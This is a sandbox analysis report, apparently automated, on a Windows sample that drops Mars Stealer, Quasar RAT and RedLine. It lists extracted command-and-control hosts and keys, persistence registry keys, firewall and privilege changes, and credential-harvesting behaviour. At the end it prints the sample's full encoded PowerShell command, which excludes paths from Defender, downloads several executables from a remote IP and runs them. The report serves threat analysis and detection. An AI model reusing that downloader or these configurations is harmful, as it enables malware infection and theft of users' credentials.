marsstealer | d1094bd38c1ea44442a040638da874d6ee15d6147ddaa5ada67f3598de545f02

Analysis

max time kernel
79s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-de
resource tags

arch:x64arch:x86image:win10v2004-20220812-delocale:de-deos:windows10-2004-x64systemwindows
submitted
18-11-2022 12:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MegaTeam.exe
Size

30KB
MD5

867eb3366690a2cd20ea3386c0ce8e82
SHA1

54b7e8f0d345e9907e309841490ca4d76807521b
SHA256

d1094bd38c1ea44442a040638da874d6ee15d6147ddaa5ada67f3598de545f02
SHA512

f98d01c6a13e9c833402178d0ac7f395fb6ee797ab8aa07b375cea5b31e709b083b092d232280878a3f0f90267726d788f23d525c6074143c75253a3622ac539
SSDEEP

384:p3O8DHK61imwJpt6CMwBEdE3b9kAI9X+E+eJlLpTvFBcw3eDG8EYjjrU4du:vHKMimkXMYQ/H+E/TLpwEeDGLYjj

Score

10^/10

marsstealer quasar redline 1877 default collection discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

1877

overthinker1877.duckdns.org:60732

Extracted

Family

quasar

Version

2.7.0.0

Botnet

1877

overthinker1877.duckdns.org:4545

Mutex

xiBqon3YI4gHicsPTt

Attributes

encryption_key
IshCdNN3oYnjATmMydkq
install_name
1877.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Venom Client Startup

Extracted

Family

marsstealer

Botnet

Default

mars1877.duckdns.org/gate.php

Signatures

Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 40 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1877.exe	family_quasar
C:\Users\Admin\AppData\Roaming\1877.exe	family_quasar
behavioral1/memory/4948-174-0x0000000000D60000-0x0000000000E70000-memory.dmp	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar
C:\Program Files (x86)\1877.exe	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\svchosts.exe	family_redline
C:\Users\Admin\AppData\Roaming\svchosts.exe	family_redline
behavioral1/memory/1136-163-0x0000000000130000-0x0000000000168000-memory.dmp	family_redline

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

19 2484 powershell.exe
Downloads MZ/PE file

flow	pid	process
19	2484	powershell.exe

Executes dropped EXE 44 IoCs

Processes:

svchosts.exesvchost.execvshosts.exe1877.exeoverthinker.exe1877.exeZip.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe1877.exe

pid	process
1136	svchosts.exe
1724	svchost.exe
2372	cvshosts.exe
4948	1877.exe
4744	overthinker.exe
3932	1877.exe
888	Zip.exe
2660	1877.exe
3232	1877.exe
3664	1877.exe
4972	1877.exe
2600	1877.exe
1272	1877.exe
2252	1877.exe
3500	1877.exe
4268	1877.exe
4696	1877.exe
3688	1877.exe
4936	1877.exe
488	1877.exe
2744	1877.exe
4080	1877.exe
4568	1877.exe
4564	1877.exe
2784	1877.exe
1000	1877.exe
3528	1877.exe
4272	1877.exe
1328	1877.exe
980	1877.exe
4876	1877.exe
3384	1877.exe
2524	1877.exe
4180	1877.exe
1524	1877.exe
1292	1877.exe
4492	1877.exe
3948	1877.exe
3908	1877.exe
4208	1877.exe
1456	1877.exe
1420	1877.exe
3372	1877.exe
4120	1877.exe

Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

5064 netsh.exe
4032 netsh.exe

pid	process
5064	netsh.exe
4032	netsh.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MegaTeam.exe1877.exe1877.exeoverthinker.exeWScript.execvshosts.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	MegaTeam.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	1877.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	1877.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	overthinker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cvshosts.exe

Loads dropped DLL 2 IoCs

Processes:

cvshosts.exe

pid process

2372 cvshosts.exe
2372 cvshosts.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2372	cvshosts.exe
2372	cvshosts.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

overthinker.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	overthinker.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	overthinker.exe
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	overthinker.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

overthinker.exeWScript.exeWScript.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update_221801.exe / start"	overthinker.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Program Files (x86)\\1877.exe"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Venom Client Startup = "C:\\Program Files (x86)\\1877.exe"	WScript.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

49 ip-api.com

flow	ioc
49	ip-api.com

Drops file in Program Files directory 4 IoCs

Processes:

1877.exe1877.exeWScript.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\1877.exe	1877.exe
File opened for modification	C:\Program Files (x86)\1877.exe	1877.exe
File opened for modification	C:\Program Files (x86)\1877.exe	WScript.exe
File created	C:\Program Files (x86)\1877.exe	1877.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cvshosts.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cvshosts.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cvshosts.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1164 schtasks.exe
4780 schtasks.exe

pid	process
1164	schtasks.exe
4780	schtasks.exe

Modifies registry class 3 IoCs

Processes:

explorer.exeWScript.exe1877.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	1877.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2820 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2516 PING.EXE

pid	process
2820	reg.exe

pid	process
2516	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeoverthinker.exe1877.exe

pid	process
2484	powershell.exe
2484	powershell.exe
4744	overthinker.exe
4744	overthinker.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe
3932	1877.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeoverthinker.exesvchosts.exe1877.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	4744	overthinker.exe
Token: SeDebugPrivilege	1136	svchosts.exe
Token: SeDebugPrivilege	4948	1877.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1528	WMIC.exe
Token: SeSecurityPrivilege	1528	WMIC.exe
Token: SeTakeOwnershipPrivilege	1528	WMIC.exe
Token: SeLoadDriverPrivilege	1528	WMIC.exe
Token: SeSystemProfilePrivilege	1528	WMIC.exe
Token: SeSystemtimePrivilege	1528	WMIC.exe
Token: SeProfSingleProcessPrivilege	1528	WMIC.exe
Token: SeIncBasePriorityPrivilege	1528	WMIC.exe
Token: SeCreatePagefilePrivilege	1528	WMIC.exe
Token: SeBackupPrivilege	1528	WMIC.exe
Token: SeRestorePrivilege	1528	WMIC.exe
Token: SeShutdownPrivilege	1528	WMIC.exe
Token: SeDebugPrivilege	1528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1528	WMIC.exe
Token: SeRemoteShutdownPrivilege	1528	WMIC.exe
Token: SeUndockPrivilege	1528	WMIC.exe
Token: SeManageVolumePrivilege	1528	WMIC.exe
Token: 33	1528	WMIC.exe
Token: 34	1528	WMIC.exe
Token: 35	1528	WMIC.exe
Token: 36	1528	WMIC.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeSecurityPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeSecurityPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeSecurityPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe
Token: SeBackupPrivilege	4948	1877.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1877.exe

pid process

3932 1877.exe

pid	process
3932	1877.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

MegaTeam.exepowershell.execmd.exenet.exenet.exenet.exe1877.execmd.exe

description	pid	process	target process
PID 444 wrote to memory of 2484	444	MegaTeam.exe	powershell.exe
PID 444 wrote to memory of 2484	444	MegaTeam.exe	powershell.exe
PID 444 wrote to memory of 2484	444	MegaTeam.exe	powershell.exe
PID 2484 wrote to memory of 1136	2484	powershell.exe	svchosts.exe
PID 2484 wrote to memory of 1136	2484	powershell.exe	svchosts.exe
PID 2484 wrote to memory of 1136	2484	powershell.exe	svchosts.exe
PID 2484 wrote to memory of 1724	2484	powershell.exe	svchost.exe
PID 2484 wrote to memory of 1724	2484	powershell.exe	svchost.exe
PID 2484 wrote to memory of 1724	2484	powershell.exe	svchost.exe
PID 2484 wrote to memory of 5068	2484	powershell.exe	cmd.exe
PID 2484 wrote to memory of 5068	2484	powershell.exe	cmd.exe
PID 2484 wrote to memory of 5068	2484	powershell.exe	cmd.exe
PID 2484 wrote to memory of 2372	2484	powershell.exe	cvshosts.exe
PID 2484 wrote to memory of 2372	2484	powershell.exe	cvshosts.exe
PID 2484 wrote to memory of 2372	2484	powershell.exe	cvshosts.exe
PID 2484 wrote to memory of 4948	2484	powershell.exe	1877.exe
PID 2484 wrote to memory of 4948	2484	powershell.exe	1877.exe
PID 2484 wrote to memory of 4948	2484	powershell.exe	1877.exe
PID 2484 wrote to memory of 4744	2484	powershell.exe	overthinker.exe
PID 2484 wrote to memory of 4744	2484	powershell.exe	overthinker.exe
PID 5068 wrote to memory of 2260	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 2260	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 2260	5068	cmd.exe	net.exe
PID 2260 wrote to memory of 1320	2260	net.exe	net1.exe
PID 2260 wrote to memory of 1320	2260	net.exe	net1.exe
PID 2260 wrote to memory of 1320	2260	net.exe	net1.exe
PID 5068 wrote to memory of 4816	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 4816	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 4816	5068	cmd.exe	net.exe
PID 4816 wrote to memory of 3976	4816	net.exe	net1.exe
PID 4816 wrote to memory of 3976	4816	net.exe	net1.exe
PID 4816 wrote to memory of 3976	4816	net.exe	net1.exe
PID 5068 wrote to memory of 3564	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 3564	5068	cmd.exe	net.exe
PID 5068 wrote to memory of 3564	5068	cmd.exe	net.exe
PID 3564 wrote to memory of 540	3564	net.exe	net1.exe
PID 3564 wrote to memory of 540	3564	net.exe	net1.exe
PID 3564 wrote to memory of 540	3564	net.exe	net1.exe
PID 5068 wrote to memory of 1528	5068	cmd.exe	WMIC.exe
PID 5068 wrote to memory of 1528	5068	cmd.exe	WMIC.exe
PID 5068 wrote to memory of 1528	5068	cmd.exe	WMIC.exe
PID 4948 wrote to memory of 1164	4948	1877.exe	schtasks.exe
PID 4948 wrote to memory of 1164	4948	1877.exe	schtasks.exe
PID 4948 wrote to memory of 1164	4948	1877.exe	schtasks.exe
PID 5068 wrote to memory of 3748	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 3748	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 3748	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 2820	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 2820	5068	cmd.exe	reg.exe
PID 5068 wrote to memory of 2820	5068	cmd.exe	reg.exe
PID 4948 wrote to memory of 3932	4948	1877.exe	1877.exe
PID 4948 wrote to memory of 3932	4948	1877.exe	1877.exe
PID 4948 wrote to memory of 3932	4948	1877.exe	1877.exe
PID 5068 wrote to memory of 5064	5068	cmd.exe	netsh.exe
PID 5068 wrote to memory of 5064	5068	cmd.exe	netsh.exe
PID 5068 wrote to memory of 5064	5068	cmd.exe	netsh.exe
PID 4948 wrote to memory of 4540	4948	1877.exe	cmd.exe
PID 4948 wrote to memory of 4540	4948	1877.exe	cmd.exe
PID 4948 wrote to memory of 4540	4948	1877.exe	cmd.exe
PID 4540 wrote to memory of 3080	4540	cmd.exe	chcp.com
PID 4540 wrote to memory of 3080	4540	cmd.exe	chcp.com
PID 4540 wrote to memory of 3080	4540	cmd.exe	chcp.com
PID 5068 wrote to memory of 4032	5068	cmd.exe	netsh.exe
PID 5068 wrote to memory of 4032	5068	cmd.exe	netsh.exe

outlook_office_path 1 IoCs

Processes:

overthinker.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	overthinker.exe

outlook_win_path 1 IoCs

Processes:

overthinker.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	overthinker.exe

C:\Users\Admin\AppData\Local\Temp\MegaTeam.exe
"C:\Users\Admin\AppData\Local\Temp\MegaTeam.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAbgBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBlAGEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBiAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADMALgA5ADAALgAxADIAOAAuADIANQAzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcALAAgADwAIwBmAGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAYgBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcAKQApADwAIwB3AGUAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAsACAAPAAjAGUAdwBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB6AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMAaABvAHMAdAAuAGUAeABlACcAKQApADwAIwB3AHcAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAxADgANwA3AC4AYgBhAHQAJwAsACAAPAAjAGgAeAB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQBsAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABtAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQA4ADcANwAuAGIAYQB0ACcAKQApADwAIwBuAHYAaAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBjAHYAcwBoAG8AcwB0AHMALgBlAHgAZQAnACwAIAA8ACMAbAB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGsAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AHIAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAHYAcwBoAG8AcwB0AHMALgBlAHgAZQAnACkAKQA8ACMAZgBiAGsAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMQA4ADcANwAuAGUAeABlACcALAAgADwAIwBxAGgAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AZwB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYwBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAOAA3ADcALgBlAHgAZQAnACkAKQA8ACMAcgB3AGkAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbwB2AGUAcgB0AGgAaQBuAGsAZQByAC4AZQB4AGUAJwAsACAAPAAjAHkAaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBzAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbwB2AGUAcgB0AGgAaQBuAGsAZQByAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAcwB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AHUAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACkAPAAjAHgAdABiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAHgAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwApADwAIwB2AGgAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBqAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQA4ADcANwAuAGIAYQB0ACcAKQA8ACMAeQB6AGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawB3AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AbABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAegBkAG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgA